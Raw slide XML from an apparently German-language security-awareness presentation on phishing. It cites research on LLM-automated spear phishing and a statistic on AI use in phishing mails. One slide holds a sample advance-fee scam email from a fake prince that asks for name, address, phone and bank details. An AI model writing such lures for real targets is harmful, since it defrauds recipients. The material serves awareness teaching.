          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0"/>
              <a:t>Von: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Prinz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Adewale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Okoro </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" u="sng" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="333333"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;prince@adewale.tk&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0"/>
              <a:t>An: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>manuel.reinsperger@a1.digital</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" b="1" dirty="0"/>
              <a:t>Betreff: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>DRINGEND – Vertrauliche Geldüberweisung</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Sehr geehrter Freund,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Ich bin Prinz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Adewale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Okoro, einziger Erbe des verstorbenen Königs von Lagos. Auf einem sicheren Konto liegen 27,5 Mio. USD, die ich wegen politischer Unruhen nur mit Hilfe eines vertrauenswürdigen ausländischen Partners transferieren kann. Für deine Unterstützung erhältst du 30 % Provision.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Bitte sende mir umgehend deinen vollständigen Namen, Adresse, Telefonnummer und Bankverbindung. Diskretion und schnelle Antwort sind entscheidend.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Mit Dank und Hochachtung,</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="de-DE" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t>Prinz </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0" err="1"/>
              <a:t>Adewale</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="de-DE" dirty="0"/>
              <a:t> Okoro</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="de-AT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Textplatzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE0A6959-DF75-F667-6119-F5E63F6FB869}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2088939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32008-7C38-4DCB-997C-9881C09CF987}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83332" y="656692"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
              <a:t>Evaluating Large Language Models’ Capability to Launch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
              <a:t>Fully Automated Spear</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
              <a:t>Phishing Campaigns: Validated on Human Subjects</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="7000" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Textfeld 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{893519D9-F667-3D32-0DC8-6931434D92FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076220" y="6201308"/>
            <a:ext cx="3924436" cy="468052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heiding et al., 2024</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="150247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BB26B-9957-B291-CC0C-6E62D8207EE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5CD49A-AE2B-236B-07F9-B8601DC4F657}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83332" y="656692"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
              <a:t>Evaluating Large Language Models’ Capability to Launch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DA291C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Fully Automated Spear</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="7000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DA291C"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DA291C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Phishing Campaigns</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
              <a:t>: Validated on Human Subjects</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="7000" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textfeld 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{29E0307C-C8C3-F74E-EDEE-D94F4AA20F6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076220" y="6201308"/>
            <a:ext cx="3924436" cy="468052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heiding et al., 2024</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="99703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1177-768A-17AE-2836-88ABB276990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387083-6690-FAC3-E198-B53118373734}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="83332" y="656692"/>
            <a:ext cx="11520000" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
              <a:t>Evaluating Large Language Models’ Capability to Launch</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
              <a:t>Fully Automated Spear</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" b="0" dirty="0"/>
              <a:t>Phishing Campaigns: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="7000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="DA291C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Validated on Human Subjects</a:t>
            </a:r>
            <a:endParaRPr lang="de-DE" sz="7000" dirty="0">
              <a:solidFill>
                <a:srgbClr val="DA291C"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textfeld 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5016BAA-BC79-B458-FCDE-9ABAD4B502EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8076220" y="6201308"/>
            <a:ext cx="3924436" cy="468052"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heiding et al., 2024</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="2400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1697006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B5546-7727-8CFF-7A0D-3E4027E45DFD}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>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9D6A1E39-75D9-386C-CE0A-32EF76049969}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1375464284"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="407368" y="1161257"/>
          <a:ext cx="3683732" cy="45354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m 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0EECD13B-ABE0-173E-1B26-C1362EA719ED}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2441830481"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="8204609" y="1161256"/>
          <a:ext cx="3683732" cy="45354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platzhalter 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B1BF8A7-433F-47D5-C31E-8EA8AE382FFE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="18"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10498725" y="6532548"/>
            <a:ext cx="1266532" cy="273600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="de-DE" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Diagramm 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B0C0C09A-3066-C61D-9242-E72CC76D8B24}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2215546014"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="4254134" y="1161257"/>
          <a:ext cx="3683732" cy="45354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463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A6CE0C-C2B5-E763-A359-45E9AC0EE44C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="16644" y="2060848"/>
            <a:ext cx="11839996" cy="2628000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" dirty="0"/>
              <a:t>82.6% der Phishing Mails </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" dirty="0" err="1"/>
              <a:t>nutzten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="8800" dirty="0"/>
              <a:t> 2025 KI</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" sz="8800" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Textplatzhalter 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B317385C-FAC0-1D3E-4CFE-19E9A1EE7119}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7860196" y="4329099"/>
            <a:ext cx="3636479" cy="1477035"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Phishing Threat Trends Report</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>KnowBe4 2025</a:t>
            </a:r>
            <a:endParaRPr lang="de-AT" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="A1DigitalIdentifier_weiss">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5F809952-6B56-2579-4BBC-7B68ECBCF903}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks noChangeAspect="1"/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="10498725" y="6538582"/>
            <a:ext cx="1267004" cy="273601"/>
            <a:chOff x="6992830" y="2371951"/>
            <a:chExt cx="4613275" cy="996206"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="6" name="Freihandform: Form 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E9DA6BAD-4FB6-8E74-E6EC-8AC6BF88270F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="6992830" y="2371951"/>
              <a:ext cx="122659" cy="914341"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY0" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX1" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY1" fmla="*/ 0 h 914341"/>
                <a:gd name="connsiteX2" fmla="*/ 122659 w 122659"/>
                <a:gd name="connsiteY2" fmla="*/ 914341 h 914341"/>
                <a:gd name="connsiteX3" fmla="*/ 0 w 122659"/>
                <a:gd name="connsiteY3" fmla="*/ 914341 h 914341"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="connsiteX0" y="connsiteY0"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX1" y="connsiteY1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX2" y="connsiteY2"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="connsiteX3" y="connsiteY3"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="122659" h="914341">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="122659" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="122659" y="914341"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="9143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latin typeface="A1 Sans" pitchFamily="2" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Freihandform: Form 6">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A091E4D-D67A-CA72-2404-33549F8792A5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="7423683" y="2426800"/>
              <a:ext cx="4182422" cy="941357"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="connsiteX0" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY0" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX1" fmla="*/ 3512056 w 4182422"/>
                <a:gd name="connsiteY1" fmla="*/ 599184 h 941357"/>
                <a:gd name="connsiteX2" fmla="*/ 3516701 w 4182422"/>
                <a:gd name="connsiteY2" fmla="*/ 622437 h 941357"/>
                <a:gd name="connsiteX3" fmla="*/ 3588311 w 4182422"/>
                <a:gd name="connsiteY3" fmla="*/ 651261 h 941357"/>
                <a:gd name="connsiteX4" fmla="*/ 3687819 w 4182422"/>
                <a:gd name="connsiteY4" fmla="*/ 623348 h 941357"/>
                <a:gd name="connsiteX5" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY5" fmla="*/ 574988 h 941357"/>
                <a:gd name="connsiteX6" fmla="*/ 3705512 w 4182422"/>
                <a:gd name="connsiteY6" fmla="*/ 549872 h 941357"/>
                <a:gd name="connsiteX7" fmla="*/ 3600394 w 4182422"/>
                <a:gd name="connsiteY7" fmla="*/ 545242 h 941357"/>
                <a:gd name="connsiteX8" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY8" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX9" fmla="*/ 2380740 w 4182422"/>
                <a:gd name="connsiteY9" fmla="*/ 378729 h 941357"/>
                <a:gd name="connsiteX10" fmla="*/ 2311948 w 4182422"/>
                <a:gd name="connsiteY10" fmla="*/ 507071 h 941357"/>
                <a:gd name="connsiteX11" fmla="*/ 2319386 w 4182422"/>
                <a:gd name="connsiteY11" fmla="*/ 560072 h 941357"/>
                <a:gd name="connsiteX12" fmla="*/ 2421660 w 4182422"/>
                <a:gd name="connsiteY12" fmla="*/ 635403 h 941357"/>
                <a:gd name="connsiteX13" fmla="*/ 2536069 w 4182422"/>
                <a:gd name="connsiteY13" fmla="*/ 507983 h 941357"/>
                <a:gd name="connsiteX14" fmla="*/ 2419807 w 4182422"/>
                <a:gd name="connsiteY14" fmla="*/ 371294 h 941357"/>
                <a:gd name="connsiteX15" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY15" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX16" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY16" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX17" fmla="*/ 2953445 w 4182422"/>
                <a:gd name="connsiteY17" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX18" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY18" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX19" fmla="*/ 3016678 w 4182422"/>
                <a:gd name="connsiteY19" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX20" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY20" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX21" fmla="*/ 2764635 w 4182422"/>
                <a:gd name="connsiteY21" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX22" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY22" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX23" fmla="*/ 2835331 w 4182422"/>
                <a:gd name="connsiteY23" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX24" fmla="*/ 2771158 w 4182422"/>
                <a:gd name="connsiteY24" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX25" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY25" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX26" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY26" fmla="*/ 283028 h 941357"/>
                <a:gd name="connsiteX27" fmla="*/ 2087043 w 4182422"/>
                <a:gd name="connsiteY27" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX28" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY28" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX29" fmla="*/ 2150294 w 4182422"/>
                <a:gd name="connsiteY29" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX30" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY30" fmla="*/ 736857 h 941357"/>
                <a:gd name="connsiteX31" fmla="*/ 1898246 w 4182422"/>
                <a:gd name="connsiteY31" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX32" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY32" fmla="*/ 635488 h 941357"/>
                <a:gd name="connsiteX33" fmla="*/ 1968924 w 4182422"/>
                <a:gd name="connsiteY33" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX34" fmla="*/ 1904769 w 4182422"/>
                <a:gd name="connsiteY34" fmla="*/ 384399 h 941357"/>
                <a:gd name="connsiteX35" fmla="*/ 3615295 w 4182422"/>
                <a:gd name="connsiteY35" fmla="*/ 270888 h 941357"/>
                <a:gd name="connsiteX36" fmla="*/ 3685026 w 4182422"/>
                <a:gd name="connsiteY36" fmla="*/ 275531 h 941357"/>
                <a:gd name="connsiteX37" fmla="*/ 3807787 w 4182422"/>
                <a:gd name="connsiteY37" fmla="*/ 357386 h 941357"/>
                <a:gd name="connsiteX38" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY38" fmla="*/ 468045 h 941357"/>
                <a:gd name="connsiteX39" fmla="*/ 3822687 w 4182422"/>
                <a:gd name="connsiteY39" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX40" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY40" fmla="*/ 635446 h 941357"/>
                <a:gd name="connsiteX41" fmla="*/ 3885920 w 4182422"/>
                <a:gd name="connsiteY41" fmla="*/ 736816 h 941357"/>
                <a:gd name="connsiteX42" fmla="*/ 3716656 w 4182422"/>
                <a:gd name="connsiteY42" fmla="*/ 736816 h 941357"/>
